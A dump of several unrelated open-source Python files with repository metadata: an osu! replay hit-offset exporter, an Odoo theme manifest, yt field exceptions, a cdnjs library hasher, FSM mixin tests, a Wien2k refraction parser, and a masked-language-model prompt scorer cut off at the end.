d37c7110bc4a79d498454be90a36a6776d0d7a36 | 1,747 | py | Python | scripts/save_hitoffsets.py | abraker95/ultimate_osu_analyzer | bea58c997d13c3f461ccbe682f52799f0f88fdea | [
"MIT"
] | 23 | 2019-02-27T06:20:15.000Z | 2022-03-31T22:54:11.000Z | scripts/save_hitoffsets.py | abraker95/ultimate_osu_analyzer | bea58c997d13c3f461ccbe682f52799f0f88fdea | [
"MIT"
] | 38 | 2019-03-03T17:35:39.000Z | 2021-08-23T20:43:34.000Z | scripts/save_hitoffsets.py | abraker95/ultimate_osu_analyzer | bea58c997d13c3f461ccbe682f52799f0f88fdea | [
"MIT"
] | 4 | 2020-03-30T20:43:14.000Z | 2022-03-06T19:40:15.000Z |
import os
'''
This script takes a beatmap file and a bunch of replays, calculates hitoffsets for each replay and saves them
to a *.csv file. This script works for std gamemode only.
'''
class SaveHitoffsets():
    """Compute hit offsets for osu!std replays of one beatmap and save them as CSV.

    For every replay file in a folder, the replay is scored against the
    beatmap and the resulting ``(time, hit_offset)`` pairs are exported to
    ``download/osu/hitoffsets/<beatmap_name>/<replay_name>``.
    """

    def create_dir(self, dir_path):
        """Create ``dir_path`` (including missing parents) if it does not exist.

        Prints a message instead of raising when creation fails.
        """
        try:
            # makedirs(..., exist_ok=True) removes the check-then-create race
            # of the previous exists()/mkdir() pattern and also creates any
            # missing parent directories.
            os.makedirs(dir_path, exist_ok=True)
        except OSError:
            print(f'failed to create folder: {dir_path}')

    def run(self, beatmap_name, beatmap_filepath, replay_folder):
        """Score every replay in ``replay_folder`` against the beatmap and
        export one hit-offset CSV per replay.

        NOTE(review): BeatmapIO, StdMapData, ReplayIO, StdReplayData,
        StdScoreData, StdScoreDataEnums and CmdUtils are presumably injected
        by the analyzer runtime (only ``os`` is imported here) -- confirm.
        """
        self.create_dir('download/osu/hitoffsets')
        self.create_dir(f'download/osu/hitoffsets/{beatmap_name}')
        # Only plain files in the folder are treated as replays.
        replay_filenames = [ f for f in os.listdir(replay_folder) if os.path.isfile(os.path.join(replay_folder, f)) ]
        replay_filepaths = [ f'{replay_folder}/{replay_filename}' for replay_filename in replay_filenames ]
        print('Loading map...')
        beatmap = BeatmapIO.open_beatmap(beatmap_filepath)
        print('Loading map data...')
        map_data = StdMapData.get_aimpoint_data(beatmap.hitobjects)
        print('Loading replays...')
        replays = [ ReplayIO.open_replay(replay_filepath) for replay_filepath in replay_filepaths ]
        print('Loading replay data...')
        replay_data = [ StdReplayData.get_replay_data(replay.play_data) for replay in replays ]
        print('Loading scores...')
        score_data = [ StdScoreData.get_score_data(data, map_data) for data in replay_data ]
        for replay_filename, score in zip(replay_filenames, score_data):
            # Strip the file extension for the output name.
            replay_filename = replay_filename.split('.')[0]
            # Keep only the (time, hit_offset) columns; exported transposed.
            data = score[:, [StdScoreDataEnums.TIME.value, StdScoreDataEnums.HIT_OFFSET.value ]]
            CmdUtils.export_csv(f'download/osu/hitoffsets/{beatmap_name}/{replay_filename}', data.T)
CmdUtils.export_csv(f'download/osu/hitoffsets/{beatmap_name}/{replay_filename}', data.T) | 44.794872 | 117 | 0.691471 | 1,558 | 0.891815 | 0 | 0 | 0 | 0 | 0 | 0 | 477 | 0.273039 |
d37dcd3460178c5f2fd87503fdb31b744dd39932 | 779 | py | Python | theme_clean/__manifest__.py | YnievesDotNetTeam/addons | 2dd619ed7897a61bedef720d73509cb693a7f6cf | [
"MIT"
] | null | null | null | theme_clean/__manifest__.py | YnievesDotNetTeam/addons | 2dd619ed7897a61bedef720d73509cb693a7f6cf | [
"MIT"
] | null | null | null | theme_clean/__manifest__.py | YnievesDotNetTeam/addons | 2dd619ed7897a61bedef720d73509cb693a7f6cf | [
"MIT"
] | null | null | null | {
'name': 'Clean Theme',
'description': 'Clean Theme',
'category': 'Theme/Services',
'summary': 'Corporate, Business, Tech, Services',
'sequence': 120,
'version': '2.0',
'author': 'Odoo S.A.',
'depends': ['theme_common', 'website_animate'],
'data': [
'views/assets.xml',
'views/image_content.xml',
'views/snippets/s_cover.xml',
'views/snippets/s_carousel.xml',
'views/snippets/s_text_image.xml',
'views/snippets/s_three_columns.xml',
'views/snippets/s_call_to_action.xml',
],
'images': [
'static/description/Clean_description.jpg',
'static/description/clean_screenshot.jpg',
],
'license': 'LGPL-3',
'live_test_url': 'https://theme-clean.odoo.com',
}
| 28.851852 | 53 | 0.594352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 567 | 0.727856 |
d37e865328432ac353f4b58343c348a7671627dc | 1,283 | py | Python | yt/fields/field_exceptions.py | neutrinoceros2/yt | 8cabf6091414e4d9a5037c4ff49199adf0ae64d6 | [
"BSD-3-Clause-Clear"
] | null | null | null | yt/fields/field_exceptions.py | neutrinoceros2/yt | 8cabf6091414e4d9a5037c4ff49199adf0ae64d6 | [
"BSD-3-Clause-Clear"
] | null | null | null | yt/fields/field_exceptions.py | neutrinoceros2/yt | 8cabf6091414e4d9a5037c4ff49199adf0ae64d6 | [
"BSD-3-Clause-Clear"
] | null | null | null | class ValidationException(Exception):
pass
class NeedsGridType(ValidationException):
    """Raised when a field requires grid data, optionally with ghost zones."""

    def __init__(self, ghost_zones=0, fields=None):
        # Number of ghost zones required, and the fields that triggered the need.
        self.ghost_zones = ghost_zones
        self.fields = fields

    def __str__(self):
        return f"({self.ghost_zones}, {self.fields})"
class NeedsOriginalGrid(NeedsGridType):
    """Raised when a field must be computed on the original grid.

    Equivalent to :class:`NeedsGridType` with zero ghost zones.
    """

    def __init__(self):
        # Delegate to the parent so that ``fields`` is initialized as well.
        # Previously only ``ghost_zones`` was assigned, so the inherited
        # __str__ raised AttributeError when it accessed ``self.fields``.
        super().__init__(ghost_zones=0)
class NeedsDataField(ValidationException):
    """Raised when required data fields are missing."""

    def __init__(self, missing_fields):
        # The fields that could not be found.
        self.missing_fields = missing_fields

    def __str__(self):
        return f"({self.missing_fields})"
class NeedsProperty(ValidationException):
    """Raised when required properties are missing."""

    def __init__(self, missing_properties):
        # The properties that could not be found.
        self.missing_properties = missing_properties

    def __str__(self):
        return f"({self.missing_properties})"
class NeedsParameter(ValidationException):
    """Raised when required parameters are missing."""

    def __init__(self, missing_parameters):
        # The parameters that could not be found.
        self.missing_parameters = missing_parameters

    def __str__(self):
        return f"({self.missing_parameters})"
class NeedsConfiguration(ValidationException):
def __init__(self, parameter, value):
self.parameter = parameter
self.value = value
def __str__(self):
return f"(Needs {self.parameter} = {self.value})"
class FieldUnitsError(Exception):
pass
| 23.759259 | 57 | 0.699922 | 1,261 | 0.982853 | 0 | 0 | 0 | 0 | 0 | 0 | 166 | 0.129384 |
d37f7f65c54c00d4b7ca2de97d0ffc3744d354d3 | 5,923 | py | Python | sanejs/sanejs.py | Lookyloo/sanejs | 129ee49e538184e5da595a0cb0b3d3b782e60687 | [
"BSD-2-Clause"
] | 2 | 2021-05-20T14:15:30.000Z | 2021-07-06T15:06:32.000Z | sanejs/sanejs.py | Lookyloo/sanejs | 129ee49e538184e5da595a0cb0b3d3b782e60687 | [
"BSD-2-Clause"
] | 56 | 2021-07-13T15:54:39.000Z | 2022-03-31T14:03:50.000Z | sanejs/sanejs.py | Lookyloo/sanejs | 129ee49e538184e5da595a0cb0b3d3b782e60687 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import hashlib
import json
import time
from redis import Redis
from git import Repo # type: ignore
from .helpers import get_homedir, get_socket_path
"""
sha: set of libname|version|fullpath
libname|version: hash of fullpath -> sha
"""
# We assume the initialisation of the submodule is done before calling this class.
class SaneJS():
def __init__(self, loglevel: int=logging.DEBUG) -> None:
self.__init_logger(loglevel)
self.libs_path = get_homedir() / 'cdnjs' / 'ajax' / 'libs'
self.redis_lookup = Redis(unix_socket_path=get_socket_path('lookup'), decode_responses=True)
self.cdnjs_repo = Repo(str(get_homedir() / 'cdnjs'))
def __init_logger(self, loglevel: int):
self.logger = logging.getLogger(f'{self.__class__.__name__}')
self.logger.setLevel(loglevel)
def _pull_dnsjs(self):
last_commit_ts = self.redis_lookup.get('last_commit')
if not last_commit_ts or int(last_commit_ts) < time.time() - 10000:
self.cdnjs_repo.remote('origin').pull()
return True
return False
def compute_hashes(self, force_recompute: bool=False):
'''Compute the hashes for the (new) files, create a file in the root directory of each library'''
if force_recompute:
self.logger.info('Force recompute and re-cache everything.')
self.redis_lookup.flushdb()
if not self._pull_dnsjs():
return
self.logger.debug('Compute hashes.')
for libname in self.libs_path.iterdir():
# libname is the path to the library, it contains a directory for each version
if not libname.is_dir():
continue
short_libname = libname.as_posix().replace(self.libs_path.as_posix() + '/', '')
self.logger.info(f'Processing {short_libname}.')
all_hashes_lib = {}
p = self.redis_lookup.pipeline()
p.sadd('all_libraries', short_libname)
for version in libname.iterdir():
# This is the directory for a version of the library. It can contain all kind of directories and files
if not version.is_dir():
if version.name not in ['package.json', 'hashes.json', '.donotoptimizepng']:
# packages.json is expected, and we don't care
self.logger.warning(f'That is it Oo -> {version}.')
continue
short_version = version.as_posix().replace(libname.as_posix() + '/', '')
if force_recompute or not (version / 'hashes.json').exists():
# Only compute the *new* hashes (unless specified)
to_save = {}
for to_hash in version.glob('**/*'):
if not to_hash.is_file() or to_hash.name == 'hashes.json':
continue
# The file may or may not have a new line at the end.
# The files we want to check against may or may not have the new line at the end.
# We will compute both hashes.
with open(to_hash, 'rb') as f_to_h:
content = f_to_h.read()
file_hash_default = hashlib.sha512(content)
if content:
if content[-1:] == b'\n':
# has newline
file_hash_newline = hashlib.sha512(content)
file_hash_no_newline = hashlib.sha512(content[:-1])
else:
# Doesn't have newline
file_hash_no_newline = hashlib.sha512(content)
file_hash_newline = hashlib.sha512(content + b'\n')
else:
# Empty file
file_hash_newline = file_hash_default
file_hash_newline = file_hash_default
filepath = to_hash.as_posix().replace(version.as_posix() + '/', '')
to_save[filepath] = {'newline': file_hash_newline.hexdigest(), 'no_newline': file_hash_no_newline.hexdigest(), 'default': file_hash_default.hexdigest()}
p.sadd(file_hash_newline.hexdigest(), f'{short_libname}|{short_version}|{filepath}')
p.sadd(file_hash_no_newline.hexdigest(), f'{short_libname}|{short_version}|{filepath}')
p.hset(f'{short_libname}|{short_version}', filepath, file_hash_default.hexdigest())
p.sadd(short_libname, short_version)
with open((version / 'hashes.json'), 'w') as f:
# Save the hashes in the directory (aka cache it)
json.dump(to_save, f, indent=2)
else:
# Just load the cached hashes
with open((version / 'hashes.json')) as f:
to_save = json.load(f)
for filepath, f_hash in to_save.items():
p.sadd(f_hash['newline'], f'{short_libname}|{short_version}|{filepath}')
p.sadd(f_hash['no_newline'], f'{short_libname}|{short_version}|{filepath}')
p.hset(f'{short_libname}|{short_version}', filepath, f_hash['default'])
all_hashes_lib[version.name] = to_save
with open((libname / 'hashes.json'), 'w') as f:
# Write a file with all the hashes for all the versions at the root directory of the library
json.dump(all_hashes_lib, f, indent=2)
p.execute()
self.redis_lookup.set('ready', 1)
self.logger.debug('Compute hashes done.')
| 51.504348 | 176 | 0.552592 | 5,534 | 0.934324 | 0 | 0 | 0 | 0 | 0 | 0 | 1,687 | 0.284822 |
d38046899bb752ba34cde2b37feb05ce19cf39d5 | 3,916 | py | Python | fsm/tests/test_fsm.py | romeech/fsm-mixin | 1c561c58979902ac579f2a1be521ec133e57cc64 | [
"MIT"
] | null | null | null | fsm/tests/test_fsm.py | romeech/fsm-mixin | 1c561c58979902ac579f2a1be521ec133e57cc64 | [
"MIT"
] | null | null | null | fsm/tests/test_fsm.py | romeech/fsm-mixin | 1c561c58979902ac579f2a1be521ec133e57cc64 | [
"MIT"
] | null | null | null | import pytest
from mixins.fsm import FinalStateMachineMixin
MSG_START = 'start'
MSG_COMPLETE = 'complete'
MSG_BREAK = 'break'
MSG_RESTART = 'repair'
MSG_UNREGISTERED = 'unknown'
class SampleTask(FinalStateMachineMixin):
STATE_NEW = 'new'
STATE_RUNNING = 'running'
STATE_READY = 'ready'
STATE_FAILED = 'failed'
def __init__(self):
self.status = self.initial_state
@property
def state_field_name(self):
return 'status'
@property
def registered_messages(self):
return [MSG_START, MSG_COMPLETE, MSG_BREAK, MSG_RESTART]
@property
def state_transitions(self):
return {
self.STATE_NEW: {
MSG_START: self._make_transition(self.STATE_RUNNING),
MSG_COMPLETE: self._make_transition(self.STATE_READY),
},
self.STATE_RUNNING: {
MSG_COMPLETE: self._make_transition(self.STATE_READY),
MSG_BREAK: self._make_transition(self.STATE_FAILED),
},
self.STATE_READY: {
# all messages are ignored
},
self.STATE_FAILED: {
MSG_RESTART: self._make_transition(self.STATE_RUNNING),
},
}
@property
def initial_state(self):
return self.STATE_NEW
@pytest.fixture
def sample_task():
return SampleTask()
def test_fsm_uses_state(sample_task):
sample_task.status = SampleTask.STATE_READY
assert getattr(sample_task, sample_task.state_field_name) == sample_task.status
def test_full_succes_path(sample_task):
assert sample_task.status == SampleTask.STATE_NEW
sample_task.accept_message(MSG_START)
assert sample_task.status == SampleTask.STATE_RUNNING
sample_task.accept_message(MSG_BREAK)
assert sample_task.status == SampleTask.STATE_FAILED
sample_task.accept_message(MSG_RESTART)
assert sample_task.status == SampleTask.STATE_RUNNING
sample_task.accept_message(MSG_COMPLETE)
assert sample_task.status == SampleTask.STATE_READY
def test_unregistered_msg_causes_failure(sample_task):
expected_msg = "FSM: Unexpected message ({}) is received.".format(MSG_UNREGISTERED)
with pytest.raises(Exception, message=expected_msg):
sample_task.accept_message(MSG_UNREGISTERED)
def test_short_success_path(sample_task):
assert sample_task.status == SampleTask.STATE_NEW
sample_task.accept_message(MSG_BREAK)
assert sample_task.status == SampleTask.STATE_NEW
sample_task.accept_message(MSG_COMPLETE)
assert sample_task.status == SampleTask.STATE_READY
for msg in [MSG_RESTART, MSG_START, MSG_BREAK]:
sample_task.accept_message(msg)
assert sample_task.status == SampleTask.STATE_READY
class UnrestrictedFsm(SampleTask):
@property
def registered_messages(self):
return []
@pytest.fixture
def unrestricted_fsm():
return UnrestrictedFsm()
def test_unregistred_msg_ignored(unrestricted_fsm):
assert unrestricted_fsm.status == SampleTask.STATE_NEW
unrestricted_fsm.accept_message(MSG_UNREGISTERED)
assert unrestricted_fsm.status == SampleTask.STATE_NEW
def test_unregistred_but_effective_msg(unrestricted_fsm):
assert unrestricted_fsm.status == SampleTask.STATE_NEW
unrestricted_fsm.accept_message(MSG_COMPLETE)
assert unrestricted_fsm.status == SampleTask.STATE_READY
class NotImplementedFsm(FinalStateMachineMixin):
pass
@pytest.fixture
def incomplete_fsm():
return NotImplementedFsm()
def test_state_field_name(incomplete_fsm):
with pytest.raises(NotImplementedError):
incomplete_fsm.state_field_name
def test_registered_messages(incomplete_fsm):
with pytest.raises(NotImplementedError):
incomplete_fsm.registered_messages
def test_state_transitions(incomplete_fsm):
with pytest.raises(NotImplementedError):
incomplete_fsm.state_transitions
| 27.194444 | 87 | 0.728805 | 1,291 | 0.329673 | 0 | 0 | 1,152 | 0.294178 | 0 | 0 | 147 | 0.037538 |
d380a82a7773462c1f6103e59d1fbfbfc17e5379 | 56 | py | Python | mt5_correlation/gui/__init__.py | jamiecash/mt5-correlation | 7d97b78f8c402342d6a24c2ff8a550b520629d01 | [
"MIT"
] | 10 | 2021-05-24T14:27:24.000Z | 2021-05-25T10:25:34.000Z | mt5_correlation/gui/__init__.py | jamiecash/mt5-correlation | 7d97b78f8c402342d6a24c2ff8a550b520629d01 | [
"MIT"
] | null | null | null | mt5_correlation/gui/__init__.py | jamiecash/mt5-correlation | 7d97b78f8c402342d6a24c2ff8a550b520629d01 | [
"MIT"
] | 3 | 2021-05-24T23:39:05.000Z | 2021-12-03T10:05:18.000Z | from mt5_correlation.gui.mdi import CorrelationMDIFrame
| 28 | 55 | 0.892857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d382d3822a88e748265faacefdd36edf1d822fab | 841 | py | Python | dftparse/wien2k/refract_parser.py | CitrineInformatics/dft-parser | 539fbdafe4d6c6c6aa2434fdf93206d012f75dfc | [
"Apache-2.0"
] | 1 | 2021-04-10T13:09:30.000Z | 2021-04-10T13:09:30.000Z | dftparse/wien2k/refract_parser.py | CitrineInformatics/dft-parser | 539fbdafe4d6c6c6aa2434fdf93206d012f75dfc | [
"Apache-2.0"
] | 1 | 2021-01-16T01:05:30.000Z | 2021-01-16T01:05:30.000Z | dftparse/wien2k/refract_parser.py | CitrineInformatics/dft-parser | 539fbdafe4d6c6c6aa2434fdf93206d012f75dfc | [
"Apache-2.0"
] | null | null | null | from ..core import BlockParser
def _parse_refraction(line, lines):
"""Parse Energy [eV] ref_ind_xx ref_ind_zz extinct_xx extinct_zz"""
split_line = line.split()
energy = float(split_line[0])
ref_ind_xx = float(split_line[1])
ref_ind_zz = float(split_line[2])
extinct_xx = float(split_line[3])
extinct_zz = float(split_line[4])
return {"energy": energy, "ref_ind_xx": ref_ind_xx, "ref_ind_zz": ref_ind_zz, "extinct_xx": extinct_xx,
"extinct_zz": extinct_zz}
base_rules = [
(lambda x: len(x) > 0 and "#" not in x and len(x.split()) == 5, _parse_refraction)
]
class RefractionParser(BlockParser):
"""Parser for Wien2k's .refract file"""
def __init__(self, rules=base_rules):
BlockParser.__init__(self)
for rule in rules:
self.add_rule(rule)
| 28.033333 | 107 | 0.657551 | 217 | 0.258026 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.208086 |
d3836f505332bb014cbedb07ee589147a9cb81f2 | 23,985 | py | Python | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null |
import numpy as np
import pickle
import tqdm
import os
import torch
from prompts.prompt_material import DETS_LIST, CONTENT_STRUCTS_PREFIX_LIST, CONTENT_STRUCTS_MIDDLE_LIST, CONTENT_STRUCTS_SUFFIX_LIST, TRANSFORMATIONS, LOGICAL_PREFIXES_LIST, LOGICAL_STRUCTS_LW_LIST
#######################################
# #
# CONTENT #
# #
#######################################
class ContentPromptScorer:
    """Score (hyponym, noun) word pairs against masked-LM prompts built from
    determiner/structure combinations.

    A prompt is built from the template
    '<PREFIX> <DET1> <WORD1> <MIDDLE> <DET2> <WORD2> <SUFFIX>.' and indexed by a
    key of the form idx_{det1}-idx_{det2}-idx_{prefix}-idx_{middle}-idx_{suffix}.
    Scores are the product of per-token mask-fill probabilities returned by the
    wrapped model, and are checkpointed to disk with pickle.
    """

    def __init__(self, model = None, tokenizer = None, device = None, dataset_name = ''):
        # Model used to compute scores
        # (model must expose compute_greedy / batch_compute_greedy; tokenizer is
        #  HuggingFace-style — presumably BERT-like, see the hard-coded id 103 below.)
        self.model = model
        self.tokenizer = tokenizer
        self.device = device
        # Load prompts materials
        self.dets_list = DETS_LIST
        self.structs_dict = {'prefix': CONTENT_STRUCTS_PREFIX_LIST,
                             'middle': CONTENT_STRUCTS_MIDDLE_LIST,
                             'suffix': CONTENT_STRUCTS_SUFFIX_LIST}
        # Load transformations names
        self.transformations_names = TRANSFORMATIONS
        # Define template
        self.vanilla_template = '<PREFIX> <DET1> <WORD1> <MIDDLE> <DET2> <WORD2> <SUFFIX>.'
        self.key_template = '<det1>-<det2>-<prefix>-<middle>-<suffix>'
        # Compute keys
        self._compute_keys()
        # Where to save data
        # NOTE(review): Windows-style path separators — assumes the script runs
        # on Windows; TODO confirm / switch to os.path.join for portability.
        self.filename = 'prompts\\scores\\content_prompts_scores_{}'.format(dataset_name)
        # Compute Prompts
        self.create_prompts()

    def _compute_keys(self):
        """
        Compute all the possible keys in the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
        and store them in self.list_of_keys (Cartesian product of all options).
        """
        N_dets = len(self.dets_list)
        N_prefix = len(self.structs_dict['prefix'])
        N_middle = len(self.structs_dict['middle'])
        N_suffix = len(self.structs_dict['suffix'])

        list_of_keys = []
        for idx_det1 in range(N_dets):
            for idx_det2 in range(N_dets):
                for idx_prefix in range(N_prefix):
                    for idx_middle in range(N_middle):
                        for idx_suffix in range(N_suffix):
                            key = self.key_template.replace('<det1>', str(idx_det1)).replace('<det2>', str(idx_det2))
                            key = key.replace('<prefix>', str(idx_prefix)).replace('<middle>', str(idx_middle)).replace('<suffix>', str(idx_suffix))
                            list_of_keys.append(key)
        self.list_of_keys = list_of_keys

    def _from_key_to_words(self, key):
        """
        Expect a key of the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
        Returns the corresponding [det1, det2, prefix, middle, suffix] strings.
        """
        list_of_idx = [int(idx) for idx in key.split('-')]
        det1 = self.dets_list[list_of_idx[0]]
        det2 = self.dets_list[list_of_idx[1]]
        prefix = self.structs_dict['prefix'][list_of_idx[2]]
        middle = self.structs_dict['middle'][list_of_idx[3]]
        suffix = self.structs_dict['suffix'][list_of_idx[4]]
        return [det1, det2, prefix, middle, suffix]

    def _create_prompt(self, dets, structs):
        # Substitute determiners and structure pieces into the vanilla template;
        # <WORD1>/<WORD2> placeholders are left for phi() to fill with masks.
        det1, det2 = dets
        prefix, middle, suffix = structs
        sentence = self.vanilla_template.replace('<DET1>', det1).replace('<DET2>', det2)
        sentence = sentence.replace('<PREFIX>', prefix).replace('<MIDDLE>', middle).replace('<SUFFIX>', suffix)
        return sentence

    def create_prompts(self):
        """
        Builds self.dict_of_prompts.
        Returns : keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
                  value sentence
        """
        dict_of_prompts = {}
        for key in self.list_of_keys:
            words_from_keys = self._from_key_to_words(key)
            dets, structs = words_from_keys[0:2], words_from_keys[2:5]
            sentence = self._create_prompt(dets, structs)
            dict_of_prompts[key] = sentence
        self.dict_of_prompts = dict_of_prompts

    def compute_all_pairs_scores(self, list_of_words):
        """
        expect words = list of pairs [HYPONYM, NOUN]
        returns : dict -> key "HYPONYM---NOUN"
                          value dict -> key transf
                                        value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
                                                      value [score_mask1, score_mask2]
        Results are stored in self.all_pairs_scores_dict and pickled to
        self.filename; a previous pickle is resumed if it exists.
        """
        # Compute Prompts Scores
        if os.path.exists(self.filename): # Previous save
            savefile = open(self.filename, 'rb')
            all_pairs_scores_dict = pickle.load(savefile)
            savefile.close()
        else:
            all_pairs_scores_dict = {}
        num_treated = 0
        for words in tqdm.tqdm(list_of_words, total = len(list_of_words)):
            word1, word2 = words
            key = word1 + '---' + word2
            if key in all_pairs_scores_dict.keys(): #If we have already computed this key go to the next
                continue
            scores_dict = self.batch_compute_one_pair_scores(words)
            all_pairs_scores_dict[key] = scores_dict
            num_treated += 1
            if num_treated % 20000 == 0: #Save from time to time
                savefile = open(self.filename, 'wb')
                pickle.dump(all_pairs_scores_dict, savefile)
                savefile.close()
        self.all_pairs_scores_dict = all_pairs_scores_dict
        # Save scores
        savefile = open(self.filename, 'wb')
        pickle.dump(all_pairs_scores_dict, savefile)
        savefile.close()

    def compute_one_pair_scores(self, words):
        """
        Sequential (non-batched) variant of batch_compute_one_pair_scores.
        expect words = [HYPONYM, NOUN]
        returns : dict -> key transf
                          value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
                                        value [score_mask1, score_mask2]
        """
        # Tokenize the words to know the number of masks to add
        # ([1:-1] strips the special tokens added around the word, e.g. [CLS]/[SEP])
        word1, word2 = words
        masked_token_ids_1 = self.tokenizer(word1)['input_ids'][1:-1]
        masked_token_ids_2 = self.tokenizer(word2)['input_ids'][1:-1]
        N_masks_1 = len(masked_token_ids_1)
        N_masks_2 = len(masked_token_ids_2)
        # Construct sentences
        scores_dict = {}
        for transf in self.transformations_names:
            transf_score_dict = {}
            for key in self.list_of_keys:
                vanilla_sentence = self.dict_of_prompts[key]
                sentence, mask1_rank, mask2_rank = self.phi(vanilla_sentence, transf, N_masks_1, N_masks_2)
                # Compute input_ids and attention_mask of the sentence
                encoding = self.tokenizer(sentence,
                                          return_tensors='pt'
                                          )
                input_ids = encoding['input_ids'].to(self.device)
                attention_mask = encoding['attention_mask'].to(self.device)
                # The model needs the masks_to_predict_pos
                masks_to_predict_pos = self.find_masks_pos(input_ids)
                score_mask1 = self._compute_model_score(input_ids, attention_mask, masked_token_ids_1, masks_to_predict_pos[mask1_rank - 1])
                score_mask2 = self._compute_model_score(input_ids, attention_mask, masked_token_ids_2, masks_to_predict_pos[mask2_rank - 1])
                transf_score_dict[key] = [score_mask1, score_mask2]
            scores_dict[transf] = transf_score_dict
        return scores_dict

    def _compute_model_score(self, input_ids, attention_mask, masked_token_ids, masks_to_predict_pos):
        # Score one mask cluster: product of per-token greedy probabilities.
        # Compute the probabilities and ranks from the model
        with torch.no_grad():
            probs_n_ranks = self.model.compute_greedy(input_ids, attention_mask, masks_to_predict_pos, masked_token_ids)
        # Compute scores (column 0 holds probabilities; ranks are discarded)
        score = probs_n_ranks[:,0].prod()
        return score

    def batch_compute_one_pair_scores(self, words):
        """
        Batched variant: scores all prompt keys in one forward pass per transformation.
        expect words = [HYPONYM, NOUN]
        returns : dict -> key transf
                          value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
                                        value [score_mask1, score_mask2]
        """
        # Tokenize the words to know the number of masks to add
        # (token ids are tiled to one row per prompt key to match the batch)
        word1, word2 = words
        masked_token_ids_1 = self.tokenizer(word1, return_tensors='pt')['input_ids'][:,1:-1].repeat(len(self.list_of_keys),1).to(self.device)
        masked_token_ids_2 = self.tokenizer(word2, return_tensors='pt')['input_ids'][:,1:-1].repeat(len(self.list_of_keys),1).to(self.device)
        N_masks_1 = masked_token_ids_1.shape[1]
        N_masks_2 = masked_token_ids_2.shape[1]
        # Construct sentences
        scores_dict = {}
        for transf in self.transformations_names:
            transf_score_dict = {}
            sentences = []
            mask1_ranks, mask2_ranks = [], []
            for key in self.list_of_keys:
                vanilla_sentence = self.dict_of_prompts[key]
                sentence, mask1_rank, mask2_rank = self.phi(vanilla_sentence, transf, N_masks_1, N_masks_2)
                sentences.append(sentence)
                mask1_ranks.append(mask1_rank)
                mask2_ranks.append(mask2_rank)
            # Compute input_ids and attention_mask of the sentence
            encoding = self.tokenizer(sentences,
                                      padding = True,
                                      return_tensors='pt'
                                      )
            input_ids = encoding['input_ids'].to(self.device)
            attention_mask = encoding['attention_mask'].to(self.device)
            # The model needs the masks_to_predict_pos
            # NOTE(review): assumes exactly two mask clusters per sentence (see
            # helper()'s 2*k indexing) — confirm padding never breaks this.
            masks_to_predict_pos = self.batch_find_masks_pos(input_ids) # We suppose this is ok
            scores_mask1 = self._batch_compute_model_score(input_ids, attention_mask, masked_token_ids_1, self.helper(masks_to_predict_pos, mask1_ranks).to(self.device))
            scores_mask2 = self._batch_compute_model_score(input_ids, attention_mask, masked_token_ids_2, self.helper(masks_to_predict_pos, mask2_ranks).to(self.device))
            for idx in range(len(self.list_of_keys)):
                key = self.list_of_keys[idx]
                transf_score_dict[key] = [scores_mask1[idx].item(), scores_mask2[idx].item()]
            scores_dict[transf] = transf_score_dict
        return scores_dict

    def _batch_compute_model_score(self, input_ids, attention_mask, masked_token_ids, masks_to_predict_pos):
        # Batched scoring: product of per-token probabilities along each row.
        # Compute the probabilities and ranks from the model
        with torch.no_grad():
            probs = self.model.batch_compute_greedy(input_ids, attention_mask, masks_to_predict_pos, masked_token_ids)
        # Compute scores
        scores = probs.prod(dim=1) # shape [batch_size = len(self.list_of_keys)]
        return scores

    def batch_find_masks_pos(self, ids_seq):
        # Find all mask-token positions across the batch and group consecutive
        # positions into clusters (one cluster per multi-token masked word).
        # NOTE(review): 103 is hard-coded as the mask token id — presumably a
        # BERT tokenizer; verify against self.tokenizer.mask_token_id.
        masks_pos = torch.where(ids_seq == 103)[1]

        pos_clusters = []
        cluster = []
        for k in range(masks_pos.shape[0]):
            cluster.append(masks_pos[k])
            if (k < len(masks_pos) -1) and (masks_pos[k] + 1 != masks_pos[k + 1]): #The next mask pos does not follow the previous one
                pos_clusters.append(torch.LongTensor(cluster))
                cluster = []
        pos_clusters.append(torch.LongTensor(cluster))

        return pos_clusters

    def helper(self, list_of_tensors, mask_rank):
        # For each batch row k, pick its mask cluster of rank mask_rank[k]
        # among that row's two clusters (stored flat as pairs at 2*k, 2*k+1),
        # and concatenate the selected positions into one flat tensor.
        batch_size = len(self.list_of_keys)
        mask_pos = []
        for k in range(batch_size):
            mask_pos.append(list_of_tensors[2*k:2*k+2][mask_rank[k] - 1])
        return torch.cat(mask_pos)

    def find_masks_pos(self, ids_seq):
        """
        Compute all mask_token positions in the sequence, then divide it into clusters (following sequence) and returns the mask_rank^th cluster.
        """
        def find_all_masks_pos(ids_seq):
            # Linear scan for the mask token id (103, see note in batch_find_masks_pos).
            pos = []
            for k in range(ids_seq.shape[1]):
                if ids_seq[0][k] == 103:
                    pos.append(k)
            return pos
        all_masks_pos = find_all_masks_pos(ids_seq)

        pos_clusters = []
        cluster = []
        for k in range(len(all_masks_pos)):
            cluster.append(all_masks_pos[k])
            if (k < len(all_masks_pos) -1) and (all_masks_pos[k] + 1 != all_masks_pos[k + 1]): #The next mask pos does not follow the previous one
                pos_clusters.append(cluster)
                cluster = []
        pos_clusters.append(cluster)

        return pos_clusters

    def phi(self, vanilla_sentence, transf, N_masks_1, N_masks_2):
        """
